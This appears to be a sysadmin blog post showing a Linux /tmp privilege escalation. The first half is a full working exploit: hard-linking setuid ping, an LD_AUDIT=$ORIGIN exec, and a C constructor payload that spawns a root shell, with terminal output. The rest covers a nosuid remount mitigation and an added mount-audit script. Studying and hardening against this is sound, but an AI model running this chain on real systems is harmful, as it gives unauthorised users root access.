Linux: privilege escalation through /tmp

Log in as an ordinary user:
[hello@localhost tmp]$ ls -ld /tmp/   because anyone can write files into /tmp!!
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[hello@localhost tmp]$ cd /tmp/
[hello@localhost tmp]$ mkdir exploit
[hello@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[hello@localhost tmp]$ exec 3< /tmp/exploit/target     open /tmp/exploit/target as file descriptor 3 of this shell
[hello@localhost tmp]$ ls -l /proc/$$/fd/3 
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[hello@localhost tmp]$ rm -fr /tmp/exploit/
[hello@localhost tmp]$ ls -l /proc/$$/fd/3 
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[hello@localhost tmp]$ cat > payload.c       a senior system administrator must know C thoroughly!!
#include <stdlib.h>
#include <unistd.h>
/* constructor: runs automatically when the shared object is loaded */
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[hello@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[hello@localhost tmp]$ ls -l /tmp/exploit 
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[hello@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3     set the LD_AUDIT environment variable for the exec
[root@localhost tmp]# whoami 
root


--------------
Reference: http://marc.info/?l=full-disclosure&m=128739684614072&w=2
Normally you do not leave world-writable (777) directories around. If you must have one, apply the following to it so that this kind of privilege escalation is kept under control, for example on /tmp:
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp      nosuid: set-user-ID bits are ignored on this mount, so the hard-linked copy of ping no longer runs as root
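To verify that the remount above actually took effect, and to catch other world-writable mountpoints that were missed, the following POSIX shell script (an added example, not part of the original post) reads /proc/mounts-style lines and reports whether each directory carries nosuid. The mount table embedded in the script is a constructed sample; when no table is passed in, the functions read the live /proc/mounts instead. The function names and the list of directories checked are choices made here, not anything the original post defines.

```shell
#!/bin/sh
# Added example: audit world-writable mountpoints for the nosuid option.
# Not from the original post; function names and sample data are assumptions.

# Constructed sample of /proc/mounts lines (not taken from a real host).
# /tmp has been bind-remounted with nosuid as on the page; /var/tmp has not.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda1 /tmp ext4 rw,nosuid,relatime 0 0
/dev/sda1 /var/tmp ext4 rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0'

# check_mount_opt MOUNTPOINT OPTION [MOUNTS_TEXT]
# Prints "ok" if the last mount entry for MOUNTPOINT carries OPTION,
# "missing" if it does not, "notmounted" if MOUNTPOINT is not a mountpoint.
# The last matching line wins, because a later bind mount shadows an
# earlier mount of the same directory (this is what the remount trick relies on).
check_mount_opt() {
    mp=$1; opt=$2; mounts=${3:-$(cat /proc/mounts)}
    found=; opts_found=
    while read -r dev mnt fstype opts rest; do
        if [ "$mnt" = "$mp" ]; then
            found=1; opts_found=$opts
        fi
    done <<EOF
$mounts
EOF
    [ -n "$found" ] || { echo notmounted; return 2; }
    case ",$opts_found," in
        *,"$opt",*) echo ok; return 0 ;;
        *)          echo missing; return 1 ;;
    esac
}

# audit_world_writable [MOUNTS_TEXT]
# Reports the nosuid state of the usual world-writable directories.
# Returns 0 only when every one of them is a mountpoint with nosuid.
audit_world_writable() {
    mounts=${1:-$(cat /proc/mounts)}
    rc=0
    for d in /tmp /var/tmp /dev/shm; do
        r=$(check_mount_opt "$d" nosuid "$mounts" || true)
        echo "$d: nosuid $r"
        [ "$r" = ok ] || rc=1
    done
    return $rc
}

# check_protected_hardlinks [VALUE]
# The exploit's first step is a hard link to a root-owned setuid binary;
# fs.protected_hardlinks=1 (Linux 3.6+) refuses that for unprivileged users.
# Prints "ok" when the sysctl is 1, "off" otherwise.
check_protected_hardlinks() {
    v=${1:-$(cat /proc/sys/fs/protected_hardlinks 2>/dev/null || echo 0)}
    if [ "$v" = 1 ]; then echo ok; return 0; fi
    echo off; return 1
}

# Stand-alone run against the constructed sample.
audit_world_writable "$SAMPLE_MOUNTS"
echo "fs.protected_hardlinks: $(check_protected_hardlinks 1 || true)"
```

Run with no arguments on a real host to audit the live mount table; a "missing" line means the directory still honours setuid bits. Two further points are worth knowing when judging exposure: hard links cannot cross filesystems, so a /tmp that is its own filesystem (a tmpfs mount, for instance) defeats the `ln /bin/ping` step on its own and only needs nosuid in its mount options rather than the bind-remount trick; and fs.protected_hardlinks=1 stops an unprivileged user from creating the hard link in the first place.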

